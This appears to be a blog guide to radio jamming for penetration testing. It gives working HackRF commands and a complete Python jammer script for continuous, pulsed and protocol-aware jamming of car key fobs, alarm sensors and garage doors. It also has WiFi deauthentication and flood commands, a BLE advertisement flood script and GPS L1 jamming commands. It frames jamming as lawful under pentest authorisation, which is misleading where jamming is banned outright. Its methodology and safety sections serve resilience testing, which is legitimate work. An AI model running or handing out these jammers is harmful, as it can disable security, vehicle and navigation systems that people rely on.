Jamming Signals/Frequencies (Guide)
- Dylan Gallus

- 2 days ago
- 8 min read

Jamming Signals/Frequencies
Signal jamming for pentesting is about testing system resilience — what happens when wireless communication fails. This is a guide on jamming signals/frequencies.
The Hardware Toolchain
What You Already Have (Flipper Zero)
The Flipper's CC1101 Sub-GHz radio can transmit continuous wave at 300-348 MHz, 387-464 MHz, and 779-928 MHz (Unleashed firmware removes the TX lock). Its BLE module (nRF52832) can flood 2.4 GHz BLE channels. Neither is a dedicated jammer but both can disrupt specific targets at close range.
What Actually Works for Pentest Jamming
Device | Range | Frequency Coverage | Power | Best For |
HackRF One | Medium | 1 MHz - 6 GHz (full) | ~15 dBm | Full-spectrum testing, protocol-aware jamming |
LimeSDR | Medium | 100 kHz - 3.8 GHz | ~10 dBm | Precise, FPGA-accelerated |
BladeRF | Medium | 47 MHz - 6 GHz | ~8 dBm | Wideband, good filtering |
CC1101 + 20dBm amp | Long | 300-928 MHz | ~100 mW | Sub-GHz only, cheap, effective |
nRF24L01 + PA/LNA | Medium | 2.4 GHz | ~20 dBm | WiFi/BLE jamming |
ESP32 | Short | 2.4 GHz (WiFi/BLE) | ~20 dBm | Deauth attacks, BLE flooding |
YARD Stick One | Medium | Sub-GHz | ~15 dBm | Dedicated Sub-GHz, good modulation |
For most vehicle and access control pentests, HackRF is the right tool. Full frequency range, good power, massive community tooling.
Frequency Landscape - What You're Jamming
Different targets, different bands:
Target System | Frequency | Modulation | Jam Type |
Car key fobs (US) | 315 MHz | ASK/OOK | CW or pattern-specific |
Car key fobs (EU) | 433.92 MHz | ASK/OOK | CW or pattern-specific |
Car PKE challenge | 125 kHz | LF CW | Magnetic field (different hardware) |
Alarm panel sensors | 315/433/868 MHz | ASK/OOK, FSK | CW or replay flooding |
Garage doors | 315/390/433 MHz | ASK/OOK, rolling | Protocol-aware |
WiFi 2.4 GHz | 2.4-2.4835 GHz | OFDM/DSSS | Deauth, channel flood |
WiFi 5 GHz | 5.15-5.85 GHz | OFDM | Channel-specific flood |
Bluetooth/BLE | 2.4-2.4835 GHz | FHSS/GFSK | Channel map flooding |
GPS L1 | 1575.42 MHz | BPSK | CW sweep (extremely low power only) |
NFC / HF RFID | 13.56 MHz | ASK, various | Magnetic field disruption |
Cellular (test lab only) | 700-2600 MHz | Various | Wideband noise (FARADAY CAGE REQUIRED) |
LoRa / LoRaWAN | 868/915 MHz | Chirp spread | Chirp-specific sweep |
Critical boundary: Jamming cellular, GPS, aviation, emergency services, or public communications is illegal regardless of pentest authorization. GPS jamming within a shielded lab for product testing is the sole exception. For a building pentest, cellular and GPS are off the table unless you own the spectrum or are in a certified Faraday environment.
Technique 1: Continuous Wave (CW)
The Sledgehammer
The simplest jam. Transmit a pure carrier at the target frequency. Any receiver near you is deafened by the signal.
HackRF — CW Jammer
bash
# Simple continuous wave at 315 MHz
hackrf_transfer -f 315000000 -x 40 -a 1 -t /dev/zero
# Parameters:
# -f: frequency in Hz
# -x 40: TX gain (0-47, 40 is max safe, 47 may overheat)
# -a 1: enable amplifier
# -t /dev/zero: transmit zeros = CW tone
# Swept CW (harder to filter, hits wider targets)
hackrf_transfer -f 315000000 -x 40 -a 1 -s 2000000 -t sweep.iq
# Where sweep.iq is a pre-generated IQ file that sweeps ±100 kHz
Flipper Zero — CW via External CC1101
bash
# Flipper GPIO → external CC1101 with PA/LNA
# Use Unleashed firmware's CC1101 ext app
# Or write custom Sub-GHz RAW that's just carrier
# On Flipper: Sub-GHz → Read → Raw → record 1 second of silence
# Edit the .sub file to extend duration
# This effectively transmits dead carrier at whatever frequency you set
Python Automation for HackRF
python
#!/usr/bin/env python3
"""
Targeted jammer for authorized pentesting.
Jams specific frequency for defined duration.
"""
import subprocess
import time
import sys
import signal
import argparse
def jam(freq_mhz, duration_sec, gain=40):
"""Transmit CW at specified frequency for specified duration"""
freq_hz = int(freq_mhz * 1_000_000)
print(f"[+] Jamming {freq_mhz} MHz for {duration_sec} seconds...")
proc = subprocess.Popen([
"hackrf_transfer",
"-f", str(freq_hz),
"-x", str(gain),
"-a", "1", # Amp on
"-t", "/dev/zero", # CW
"-s", "2000000", # Sample rate
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
try:
time.sleep(duration_sec)
except KeyboardInterrupt:
pass
finally:
proc.terminate()
proc.wait()
print("[+] Jammer stopped")
def jam_pulse(freq_mhz, on_time, off_time, cycles, gain=40):
"""Pulsed jamming — harder to locate, tests recovery behavior"""
freq_hz = int(freq_mhz * 1_000_000)
print(f"[+] Pulsed jamming {freq_mhz} MHz: "
f"{on_time}s on / {off_time}s off × {cycles}")
for i in range(cycles):
print(f" Pulse {i+1}/{cycles} — JAMMING")
proc = subprocess.Popen([
"hackrf_transfer",
"-f", str(freq_hz),
"-x", str(gain),
"-a", "1",
"-t", "/dev/zero",
"-s", "2000000",
], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
time.sleep(on_time)
proc.terminate()
proc.wait()
if i < cycles - 1:
print(f" Pulse {i+1}/{cycles} — quiet")
time.sleep(off_time)
print("[+] Pulse sequence complete")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Targeted pentest jammer")
parser.add_argument("freq", type=float, help="Target frequency in MHz")
parser.add_argument("-d", "--duration", type=int, default=10,
help="Duration in seconds")
parser.add_argument("-p", "--pulse", action="store_true",
help="Pulsed mode")
parser.add_argument("--on-time", type=float, default=2.0)
parser.add_argument("--off-time", type=float, default=3.0)
parser.add_argument("--cycles", type=int, default=5)
parser.add_argument("-g", "--gain", type=int, default=40)
args = parser.parse_args()
signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))
if args.pulse:
jam_pulse(args.freq, args.on_time, args.off_time,
args.cycles, args.gain)
else:
jam(args.freq, args.duration, args.gain)Technique 2: Protocol-Aware Jamming - The Scalpel
CW is loud and obvious. Protocol-aware jamming injects garbage into the actual protocol, disrupting communication while looking like noise to spectrum analyzers.
Sub-GHz — Car Fob / Alarm Sensor Jamming
bash
# Capture the target's actual signal first (with Flipper or HackRF)
hackrf_transfer -f 315000000 -r target_signal.iq -s 2000000 -n 20000000
# Analyze in Universal Radio Hacker (URH) or inspectcli
# Determine: modulation (ASK/OOK/FSK), bit rate, preamble, sync word
# Generate jamming signal that mimics the protocol
# — Repeating preamble (prevents sync)
# — Random payload (corrupts valid data after sync)
# — Valid structure with invalid data (fools some filters)
# URH can generate these from the captured signal
# Export as IQ file, replay with HackRF:
hackrf_transfer -f 315000000 -t protocol_jam.iq -x 40 -a 1 -R
# -R: repeat the IQ file continuously
WiFi Deauthentication (Targeted)
This is protocol-level jamming. Not a raw RF blast — you're sending valid 802.11 management frames.
bash
# Aireplay-ng — deauth specific client
sudo aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC wlan0mon
# -0 0: infinite deauth packets
# MDK4 — the dedicated WiFi jammer
sudo mdk4 wlan0mon d -c 1,6,11 # Deauth on channels 1, 6, 11
sudo mdk4 wlan0mon b -c 1 -t AP_MAC # Beacon flood on channel 1
sudo mdk4 wlan0mon a -a AP_MAC # Auth flood (DoS AP)
sudo mdk4 wlan0mon p -b 00:11:22:33:44:55 # Probe flood
# ESP32 deauther (dedicated, portable)
# Flash Spacehuhn's ESP8266/ESP32 Deauther firmware
# Battery-powered, fits in pocket
# Web interface to select targets
BLE — Advertisement Flooding
python
#!/usr/bin/env python3
"""BLE advertisement flood — tests BLE resilience"""
from scapy.all import *
from bluetooth import *
def ble_adv_flood(iface="hci0", count=1000):
"""Flood BLE advertising channels with random advertisements"""
print(f"[+] BLE flood starting on {iface}")
for i in range(count):
# Random MAC, random data
pkt = BTLE() / BTLE_ADV(RxAdd=0, TxAdd=0) / \
BTLE_ADV_IND(AdvA=RandMAC(), AdvData=b"\x00" * 31)
sendp(pkt, iface=iface, verbose=0)
if i % 100 == 0:
print(f" Sent {i} advertisements")
print(f"[+] Flood complete: {count} advertisements sent")
# For Flipper Zero: Apps → Bluetooth → BLE Spam
# Select target type (iOS, Android, Windows, Tesla)
# Floods BLE advertisements continuouslyTechnique 3: GPS Jamming (Shielded Lab Only)
GPS L1 (1575.42 MHz) is extremely weak at the receiver (~-130 dBm). Even microwatt-level jamming can overwhelm it.
This is ILLEGAL outside a certified Faraday cage. Within a shielded lab testing vehicle telematics or asset trackers:
bash
# Extremely low power GPS test signal
# ONLY in Faraday-caged environment
# Generate a swept tone across GPS L1 bandwidth (2 MHz wide)
# Using GNU Radio or custom IQ generation
python3 generate_gps_noise.py # Your IQ file generator
# Transmit at MINIMUM power
hackrf_transfer -f 1575420000 -t gps_noise.iq -x 0 -a 0 -s 2000000
# -x 0: MINIMUM gain
# -a 0: amplifier OFF
# Start with lowest power, increase only if needed
# Verify with spectrum analyzer that signal stays in cage
# The pentest question: "Does the GPS tracker detect loss of signal
# and alert? Or does it silently fail?"Technique 4: NFC / HF RFID Field Disruption
NFC and 13.56 MHz RFID use magnetic near-field coupling. Jamming requires disrupting the reader's magnetic field.
bash
# This is HARD to do at distance — near-field drops as 1/r³
# Practical only within ~10cm of the reader
# Flipper Zero approach:
# 13.56 MHz → Extra Actions → Emulate Reader
# Flipper continuously polls for cards
# This creates a competing 13.56 MHz field
# Hold Flipper against the target reader
# The reader's field and Flipper's field interfere
# Tags can't communicate with either
# Dedicated approach: Proxmark3
pm3 → hf 14a reader
# Continuous polling disrupts nearby ISO 14443 readers
# This tests: does the door fail open or fail closed?
# Does security detect the reader being disrupted?Technique 5: Sub-GHz Spoof-Jamming Hybrid
The most effective Sub-GHz attack isn't pure jamming — it's flooding with valid-looking but wrong data.
bash
# 1. Capture the target's sensor/key fob signal
hackrf_transfer -f 433920000 -r capture.iq -s 2000000 -n 10000000
# 2. Extract the protocol in URH
# Identify: preamble, sync word, payload structure, CRC
# 3. Generate hundreds of variants:
# - Valid preamble + random payload
# - Valid preamble + valid structure + random values
# - Valid structure + invalid CRC (consumes receiver processing time)
# 4. Replay at high speed
hackrf_transfer -f 433920000 -t spoof_flood.iq -x 40 -a 1 -R
# The receiver spends all its time trying to decode garbage.
# Legitimate signals are lost in the noise.Pentest Methodology - What You're Actually Testing
Jamming isn't a standalone attack. You're testing resilience:
1. Fail-Safe vs Fail-Secure
[Alarm sensor jammed] → Does it alert "sensor offline" or stay silent?
[Door controller jammed] → Does it lock, unlock, or maintain state?
[GPS jammed] → Does tracker alert, or report last known position silently?
[WiFi deauthed] → Does the security system fall back to wired? Cellular?
2. Detection Testing
[Start jamming] → How long until SOC/SIEM detects signal loss?
[Stop jamming] → Does the system auto-recover? How long?
[Pulse jamming] → Does intermittent disruption trigger alerts or get averaged out?
3. Fallback Testing
[WiFi down] → Does the alarm panel fall back to cellular? Ethernet?
[Sub-GHz down] → Do sensors have alternate paths? Wired zones?
[BLE down] → Does the phone key fall back to NFC? Keypad?
[GPS down] → Does navigation fall back to dead reckoning? INS?
Engagement Workflow
bash
# ===== PRE-ENGAGEMENT =====
# 1. Document: every frequency you'll transmit on
# 2. Document: max power level, duration, location
# 3. Confirm: Faraday cage for any GPS/cellular testing
# 4. Confirm: no adjacent medical/life-safety wireless systems
# 5. Have: spectrum analyzer ready to verify emissions stay in scope
# ===== TESTING =====
# 6. Start with minimum power, increase only as needed
# 7. Jam for minimum duration to observe effect
# 8. Allow full recovery between tests
# 9. Monitor with spectrum analyzer throughout
# ===== DOCUMENTATION =====
# 10. For each test: frequency, power, duration, observed effect
# 11. Time from jam start to detection (by blue team)
# 12. Time from jam stop to full recovery
# 13. CVSS for each findingThe Safety Boundaries
These are hard lines. Crossing them is illegal regardless of pentest authorization:
Don't | Why |
Jam cellular bands (700-2600 MHz in US) | Blocks 911 calls. Federal crime. FCC hunts aggressively. |
Jam GPS outside a Faraday cage | Aircraft, maritime, emergency services. Severe federal crime. |
Jam aviation bands (108-137 MHz) | Air traffic control. Life safety. |
Jam marine VHF (156-162 MHz) | Distress channels. Coast Guard responds. |
Jam emergency services | Police/fire/ambulance radio. Obvious. |
Jam in hospitals | Medical telemetry, pacemaker programmers. |
Jam outside your authorized scope | The authorization letter defines the building/floor/time window. Stay in it. |
Use power amplification without measurement | Know your ERP. A HackRF + 20W amp at 315 MHz will blanket a neighborhood. Don't. |
Leave the jammer unattended | You must be physically present and able to stop immediately if something goes wrong. |
Practical: HackRF Jamming Kit Build
bash
# Minimum viable pentest jamming kit:
# 1. HackRF One
# 2. Portable power (USB-C battery pack, 20000 mAh)
# 3. Laptop running Kali
# 4. Small spectrum analyzer (TinySA, ~$60 — verifies your emissions)
# 5. Appropriate antennas:
# - 315/433 MHz telescopic for Sub-GHz
# - 2.4/5 GHz for WiFi/BLE
# - GPS patch antenna (shielded lab only)
# Verify emissions before testing:
# 1. Set up HackRF at test frequency
# 2. Walk perimeter with TinySA in max-hold mode
# 3. Confirm signal is contained to authorized test area
# 4. Document the emission envelope



Comments